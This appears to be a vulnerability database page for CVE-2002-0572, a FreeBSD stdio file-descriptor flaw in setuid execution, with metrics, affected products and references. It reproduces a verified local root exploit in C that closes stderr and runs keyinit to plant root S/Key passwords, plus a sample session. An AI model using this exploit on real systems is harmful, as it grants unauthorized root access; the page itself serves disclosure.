CVE-2002-0572 : Detail

CVE-2002-0572

0.09%V3
Local
2002-06-11
02h00 +00:00
2005-12-16
23h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

FreeBSD 4.5 and earlier, and possibly other BSD-based operating systems, allows local users to write to or read from restricted files by closing the file descriptors 0 (standard input), 1 (standard output), or 2 (standard error), which may then be reused by a called setuid process that intended to perform I/O on normal files.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 21407

Publication date : 2002-04-22 22h00 +00:00
Author : phased
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/4568/info It has been reported that BSD-based kernels do not check to ensure that the C library standard I/O file descriptors 0-2 are valid open files before exec()ing setuid images. Consequently, I/O that are opened by a setuid process may be assigned file descriptors equivelent to those used by the C library as 'standard input','standard output', and 'standard error'. This may result in untrusted, attacker supplied data being written to sensitive I/O channels. Local root compromise has been confirmed as a possible consequence. */ /* phased/b10z [email protected] 23/04/2002 stdio kernel bug in All releases of FreeBSD up to and including 4.5-RELEASE decided to make a trivial exploit to easily get root :) > id uid=1003(phased) gid=999(phased) groups=999(phased) > ./iosmash Adding phased: <--- HIT CTRL-C ---> > su s/key 98 snosoft2 Password:MASS OAT ROLL TOOL AGO CAM xes# this program makes the following skeys valid 95: CARE LIVE CARD LOFT CHIC HILL 96: TESS OIL WELD DUD MUTE KIT 97: DADE BED DRY JAW GRAB NOV 98: MASS OAT ROLL TOOL AGO CAM 99: DARK LEW JOLT JIVE MOS WHO http://www.snosoft.com cheers Joost Pol */ #include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { while(dup(1) != -1); close(2); execl("/usr/bin/keyinit", "\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n"); }

Products Mentioned

Configuraton 0

Freebsd>>Freebsd >> Version 4.4

    Freebsd>>Freebsd >> Version 4.5

      Freebsd>>Freebsd >> Version 4.5

        Openbsd>>Openbsd >> Version 2.0

        Openbsd>>Openbsd >> Version 2.1

        Openbsd>>Openbsd >> Version 2.2

        Openbsd>>Openbsd >> Version 2.3

        Sun>>Solaris >> Version 2.5.1

          Sun>>Solaris >> Version 2.6

          Sun>>Solaris >> Version 7.0

            Sun>>Solaris >> Version 8.0

              Sun>>Sunos >> Version -

              Sun>>Sunos >> Version 5.5.1

              Sun>>Sunos >> Version 5.7

              Sun>>Sunos >> Version 5.8

              References

              http://www.securityfocus.com/bid/4568
              Tags : vdb-entry, x_refsource_BID
              http://www.kb.cert.org/vuls/id/809347
              Tags : third-party-advisory, x_refsource_CERT-VN
              http://www.osvdb.org/6095
              Tags : vdb-entry, x_refsource_OSVDB
              http://www.ciac.org/ciac/bulletins/m-072.shtml
              Tags : third-party-advisory, government-resource, x_refsource_CIAC
              http://online.securityfocus.com/archive/1/268970
              Tags : mailing-list, x_refsource_BUGTRAQ
              http://online.securityfocus.com/archive/1/269102
              Tags : mailing-list, x_refsource_BUGTRAQ